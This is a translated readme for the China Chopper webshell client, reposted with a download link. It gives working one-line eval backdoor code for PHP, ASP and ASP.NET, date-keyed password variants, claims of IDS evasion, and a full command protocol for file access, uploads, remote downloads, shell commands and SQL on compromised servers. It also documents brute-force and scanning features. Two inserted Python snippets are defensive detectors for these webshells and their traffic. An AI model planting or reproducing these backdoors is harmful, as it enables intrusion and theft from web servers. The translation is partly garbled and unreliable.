For downloads, please check the official website: http://www.maicaidao.com/
The official site is currently not open and many people cannot find the program, so it is posted here for anyone who needs it to download themselves!
: http://pan.baidu.com/s/1gfuoU4b
Software Introduction:
Software name: Chinese kitchen knife (China chopper)
Official website: http://www.maicaidao.com/
———————————————————————————————————-
Disclaimer:
Pay attention to the environment in which you use this program and comply with national laws and regulations!
The vendor assumes no responsibility for the consequences of improper use!
———————————————————————————————————-
The program will inevitably show various bugs in use. Check the official website for an update; the bug may already have been fixed.
———————————————————————————————————-
Compiled in Unicode mode; supports multi-language input and display.
In a non-Simplified-Chinese environment the interface switches to English automatically. Please leave a message about any translation errors.
I. Script client section (including but not limited to Eval)
1) Basic information
The Eval server side needs only a single line of code, after which this program provides the common management functions. The function code is encoded twice before it is sent, which greatly improves its ability to get past an IDS.
Currently supported server-side scripts: PHP, ASP, ASP.NET, and web sites that use HTTPS secure connections.
The code running on the server is as follows:
PHP: <?php @eval ($_post[' Chopper '));?
asp: <%eval request ("Chopper")%>
asp: <%@ page language= "Jscript"%><%eval ( Request.item["Chopper"], "unsafe");%>
(Note: for ASP.NET, use a standalone file, or a file that is itself written in JScript.)
Customize: a custom type in which the function code is stored on the server. In theory it supports any dynamic scripting language, as long as the script interacts with Chopper correctly.
This mode can be tailored on demand: a script that only browses directories, or only provides the virtual terminal, can be very short.
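A defender-side check for the one-line Eval server side described above, as an added example that is not part of the original readme: it walks a web root and reports script files that pass a request parameter straight to eval. The function names, the extension list and the 200-byte "tiny file" threshold are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# Heuristic patterns (written for this example, not vendor signatures) for script
# code that hands a request parameter directly to eval, one per documented language.
PATTERNS = {
    "php": re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\s*\[", re.I),
    "asp": re.compile(r"\b(eval|execute)\s*\(?\s*request\s*\(", re.I),
    "asp.net": re.compile(r'eval\s*\(\s*Request\.Item\s*\[.*?"unsafe"', re.I),
}
SCRIPT_EXT = {".php", ".asp", ".asa", ".aspx", ".ashx"}  # assumed extension list

def scan_text(text):
    """Return the names of the patterns that match, ignoring whitespace layout."""
    flat = re.sub(r"\s+", " ", text)
    return sorted(name for name, rx in PATTERNS.items() if rx.search(flat))

def scan_webroot(root, max_bytes=1_000_000):
    """Walk a web root and report script files that contain a matching pattern."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in SCRIPT_EXT:
            continue
        size = path.stat().st_size
        if size > max_bytes:
            continue
        hits = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            # A file that is little more than the eval call is the strongest signal.
            findings.append({"path": str(path), "patterns": hits,
                             "size": size, "tiny": size < 200})
    return findings

if __name__ == "__main__":
    for finding in scan_webroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(finding)
```

A match is a lead for review rather than a verdict: legitimate code rarely evaluates request input, but the date-derived parameter name shown below means the parameter itself cannot be used as a signature.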
Server-side form for a connection password that includes the date:
ASP.NET:
<%@ page language= "Jscript"%><%eval (request.item[ FormsAuthentication.HashPasswordForStoringInConfigFile (String.Format ("{0:YYYYMMDD}", DateTime.Now.ToUniversalTime ()) + "37e4dd20c310142564fc483db1132f36″," Md5″). ToUpper ()], "unsafe");%>
PHP:
@eval ($_post[strtoupper (MD5 (gmdate ("YMD"). " 37e4dd20c310142564fc483db1132f36″)]);
For example, if the Chopper password is chopper, add three characters in front of it; the new password is: {d}chopper
2) Several functions
Right-click and choose Add in the main view, then in the dialog that pops up enter the server-side address and the connection password (note the pass string in the example above), and choose the correct script type and language encoding.
After saving, the file management, virtual terminal, database management and self-written script functions are available.
1. File management: [Feature] caches downloaded directories and supports viewing cached directories offline;
2. Virtual terminal: [Feature] user-friendly design, easy to operate (enter help to see more usage); an extra-long command is split into 5k-byte pieces that are submitted separately.
3. Database management: [Feature] graphical interface; supports MySQL, MSSQL, Oracle, Informix, Access, and any database that supports ADO connections.
If you are fluent in SQL syntax, why bother with phpMyAdmin? Besides, Chopper supports database management under any of the script types.
(For the database connection settings under each script type, click the Configure button in the top left corner of the database management interface.)
4. Self-written scripts: the user's own script is simply encoded and submitted to the server for execution, which allows rich functionality; it can also be sent to the browser for execution instead.
If you want to write your own CCC script, refer to the sample code in the CCC directory; you should be able to write a feature-rich script too.
You can download other people's CCC scripts from the website, or share your own proud work.
Note: Some features may not work properly due to server security settings.
3) Instructions for filling in configuration information
—————————————————————————————
A) Database aspects:
—————————————————————————–
PHP script:
<T>Type</T> The type can be one of Mysql,mssql,oracle,infomix,postgresql
<H>Host address</H> The host address can be a machine name or an IP address, such as localhost
<U>Database user</U> The user name for connecting to the database, such as root
<P>Database password</P> The password for connecting to the database, such as 123455
<N>Default library</N> The name of the library to connect to by default
<L>utf8</L> This item is optional when the database type is MySQL and the script is PHP; Latin1 is not required
ASP and ASP.NET script:
<T>Type</T> The type can only be ADO
<C>ADO configuration information</C>
ADO connects to different databases in different ways. For example, the configuration information for MSSQL is
Driver={Sql Server};Server=(local);Database=master;Uid=sa;Pwd=123456;
NT authentication login to an MSSQL database is also supported, and the query result list can be exported as an HTML file.
Customize script:
<T>Type</T> The type can only be xdb
<X>Configuration information in the format agreed with the Customize script</X>
The database parameters for the Customize.jsp supplied with Chopper are filled in as follows (two lines):
MSSQL:
<X>
com.microsoft.sqlserver.jdbc.SQLServerDriver
jdbc:sqlserver://127.0.0.1:1433;databasename=test;user=sa;password=123456
</X>
MySQL:
<X>
com.mysql.jdbc.Driver
jdbc:mysql://localhost/test?user=root&password=123456
</X>
ORACLE:
<X>
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:user/[email protected]:1521/test
</X>
B) Other aspects:
—————————————————————————–
Adding extra data to be submitted with each request. For example, if the new ASP server side looks like this:
<%
Set o = Server.CreateObject ("ScriptControl")
O.language = "VBScript"
O.addcode (Request ("SC"))
O.run "FF", Server,response,request,application,session,error
%>
then fill in the following in the Chopper configuration:
<O>SC=FUNCTION+FF (Server,response,request,application,session,error): eval (Request ("Pass")): End+function </O>
Then use the password pass to connect.
Submitting an additional POST packet before the function is submitted (sent only once per session):
<POST>https://maicaidao.com/cgi-bin/login.cgi</POST>
<DATA>uid=user1&pwd=123456</DATA>
Example of default terminal program path setting:
<SHELL>/bin/sh</SHELL>
Examples of virtual terminal default command settings:
<CMD>whoami</CMD>
Example of setting the directory that file management opens by default:
<CD>c:\windows\temp\</CD>
3) HTTP login verification
Fill in the shell address like this: http://user:[email protected]/server.asp
Special characters in the user name or password can be URL-encoded.
4) Data import: in the shell list view, right-click to open the menu; from it you can import another Chopper database into the current category.
II. Security scan
Spider crawling, bound-domain lookup, directory brute-forcing.
Command explanation:
A) Look up the domain names bound to a single IP
{REVERSE_IP} {url:http://www.maicaidao.com/}
B) Scan the open web servers in this class C segment and look up their bound domain names
{Reverse_ip_c} {url:http://www.maicaidao.com/}
C) Only scan for open web servers in this class C segment
{Reverse_ip_c} {url:http://www.maicaidao.com/} {Port}
D) Spider crawling
{Spider} {url:http://www.maicaidao.com/}
E) Spider crawling with a set crawl range
{Spider} {url:http://www.maicaidao.com/} {range:maicaidao.com}
F) Spider crawling, filtering duplicate URLs to speed it up
Add {filter}
G) Brute-force function; %s is one row in Dict
Flag: followed by a specific keyword in the returned data (including HTTP headers)
Prefixing the keyword with !! makes the result true when the keyword is not present; otherwise the result is true when the keyword is present
List.txt is a file in the current directory; an absolute path can also be given. Note: do not include too many rows.
Note: starting with version 20100626, list.txt must be a Unicode-format text file
{Crack} {url:http://%s/admin/} {flag:http/1.1 200} {Dict:list.txt}
{Crack} {url:http://%s/admin/} {flag:!! http/1.1 404} {Dict:list.txt}
{Crack} {url:http://www.maicaidao.com/%s/} {flag:successfully} {Dict:list.txt}
III. Timed reminders
Use it as an alarm clock. Cycle: monthly/weekly/daily/only once.
IV. Browser
A dedicated web browser: POST browsing / custom cookies / executing custom scripts / automatic page refresh / searching for web pages on the same IP.
If an Ip.dat library is present, the status bar shows this web site's IP and country code.
V. Other parts
To be added.
——————————————–
20110628 update notes
It is best to rebuild the cache library.
——————————————–
File Description:
——————————————————————
Chopper.exe Chopper Program
Db.mdb Chopper's main database
——————————————————————
CACHE.TMP Chopper cache database (can be deleted)
Readme.txt What you are looking at now (can be deleted)
<CCC> Chopper's self-written scripts (can be deleted)
<Customize> Customize mode server side (can be deleted)
Customize.aspx A sample C# server side (full-featured)
Customize.jsp A sample JSP server side (full-featured)
Customize.cfm A sample CFM server side (file management, virtual terminal)
——Appendix—————— Communication interface between Chopper and the server side in Customize mode ——————
—————— Server-side code in other languages can be written to this interface (see Customize.jsp/Customize.cfm) ——————
Example: the password filled in on the Chopper client is pass and the page encoding selected is GB2312 (the JSP server side uses this parameter)
Note: all parameters are submitted by POST, and the returned data is marked with ->| as the start tag and |<- as the closing tag.
Note: a returned error message starts with error://
Note: \t represents a tab, \r\n a carriage return plus line feed, \n a line feed
Note: the database configuration information is a string; the server-side script can define its own format for this string.
———————————————————————————————————————————–
[Get the absolute path of the current directory]
Submit: pass=a&z0=gb2312
Return: the absolute path of the directory followed by \t; on a Windows system this is followed by the list of drives
Example: c:\inetpub\wwwroot\ c:d:e:k:
Example: /var/www/html/
[Browse a directory]
Submit: pass=b&z0=gb2312&z1=absolute path of the directory
Return: directories first, then files; a / is appended to directory names and not to file names
Example:
Directory name/\tTime\tSize\tAttributes\nDirectory name/\tTime\tSize\tAttributes\n
File name\tTime\tSize\tAttributes\nFile name\tTime\tSize\tAttributes\n
[Read a text file]
Submit: pass=c&z0=gb2312&z1=absolute path of the file
Return: the contents of the text file
[Write to a text file]
Submit: pass=d&z0=gb2312&z1=absolute path of the file&z2=file contents
Return: 1 on success, an error message on failure
[Delete a file or directory]
Submit: pass=e&z0=gb2312&z1=absolute path of the file or directory
Return: 1 on success, an error message on failure
[Download a file]
Submit: pass=f&z0=gb2312&z1=absolute path of the file on the server
Return: the contents of the file to download
[Upload a file]
Submit: pass=g&z0=gb2312&z1=absolute path of the uploaded file&z2=file contents (hexadecimal text format)
Return: the contents of the file to download
[Copy and paste a file or directory]
Submit: pass=h&z0=gb2312&z1=absolute path to copy&z2=absolute path to paste to
Return: 1 on success, an error message on failure
[Rename a file or directory]
Submit: pass=i&z0=gb2312&z1=current name (absolute path)&z2=new name (absolute path)
Return: 1 on success, an error message on failure
[New directory]
Submit: pass=j&z0=gb2312&z1=new directory name (absolute path)
Return: 1 on success, an error message on failure
[Modify the time of a file or directory]
Submit: pass=k&z0=gb2312&z1=absolute path of the file or directory&z2=time (format: yyyy-MM-dd HH:mm:ss)
Return: 1 on success, an error message on failure
[Download a file to the server]
Submit: pass=l&z0=gb2312&z1=URL path&z2=absolute path to save to after download
Return: 1 on success, an error message on failure
[Execute a shell command (the -c or /c parameter is added before the shell path according to the server system type)]
Submit: pass=m&z0=gb2312&z1=(-c or /c) plus shell path&z2=shell command
Return: the result of the command
[Get basic information about the database]
Submit: pass=n&z0=gb2312&z1=database configuration information
Return: the databases on success (\t delimited), an error message on failure
[Get database table names]
Submit: pass=o&z0=gb2312&z1=database configuration information\r\ndatabase name
Return: the data tables on success (\t delimited), an error message on failure
[Get data table column names]
Submit: pass=p&z0=gb2312&z1=database configuration information\r\ndatabase name\r\ndata table name
Return: the data columns on success (\t delimited), an error message on failure
[Execute a database command]
Submit: pass=q&z0=gb2312&z1=database configuration information\r\ndatabase name&z2=SQL command
Return: the data table contents on success, an error message on failure
Note: the first row returned is the header, followed by the data rows, and the number of columns must be consistent. Each column in a row is followed by a \t|\t marker, and each row ends with \r\n
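The interface above gives both sides of a Customize-mode exchange a fixed shape, which a defender can match in captured POST traffic. The following added example (not part of the original readme) flags request/response pairs that fit it. The function names and the sample traffic are constructed for this example, and the action letter is matched case-insensitively as an assumption.

```python
from urllib.parse import parse_qsl

# Action letter -> (meaning, count of z1/z2 arguments), per the interface list above.
ACTIONS = {
    "A": ("current directory", 0), "B": ("browse directory", 1), "C": ("read text file", 1),
    "D": ("write text file", 2), "E": ("delete", 1), "F": ("download file", 1),
    "G": ("upload file", 2), "H": ("copy/paste", 2), "I": ("rename", 2),
    "J": ("new directory", 1), "K": ("modify time", 2), "L": ("fetch URL to server", 2),
    "M": ("shell command", 2), "N": ("database info", 1), "O": ("table names", 1),
    "P": ("column names", 1), "Q": ("SQL command", 2),
}

def classify_request(body):
    """Return (password_param, meaning) when a POST body fits the interface, else None."""
    params = parse_qsl(body, keep_blank_values=True)
    z = {k.lower() for k, _ in params if k.lower() in ("z0", "z1", "z2")}
    other = [(k, v) for k, v in params if k.lower() not in ("z0", "z1", "z2")]
    if "z0" not in z or len(other) != 1:
        return None
    name, value = other[0]
    meaning, nargs = ACTIONS.get(value.upper(), (None, 0))
    wanted = {"z0"} | {f"z{i}" for i in range(1, nargs + 1)}
    return (name, meaning) if meaning and z == wanted else None

def parse_response(body):
    """Return (is_error, payload) for a body framed by ->| and |<-, else None."""
    start, end = body.find("->|"), body.rfind("|<-")
    if start < 0 or end < start + 3:
        return None
    payload = body[start + 3:end]
    return payload.lower().startswith("error://"), payload

def detect(exchanges):
    """Flag (request_body, response_body) pairs where both sides match the interface."""
    hits = []
    for req, resp in exchanges:
        req_hit, resp_hit = classify_request(req), parse_response(resp)
        if req_hit and resp_hit:
            hits.append({"param": req_hit[0], "action": req_hit[1], "error": resp_hit[0]})
    return hits

# Constructed sample traffic (not captured from a real host).
SAMPLES = [
    ("pass=A&z0=GB2312", "->|/var/www/html/\t|<-"),
    ("pass=c&z0=gb2312&z1=%2Fvar%2Fwww%2Fmissing.txt", "->|ERROR:// file not found|<-"),
    ("q=B&z0=1&page=2", "<html>search results</html>"),
]

if __name__ == "__main__":
    print(detect(SAMPLES))
```

This covers only the Customize interface documented here; the readme states that Eval-mode function code is encoded before sending, so that traffic needs a separate signature.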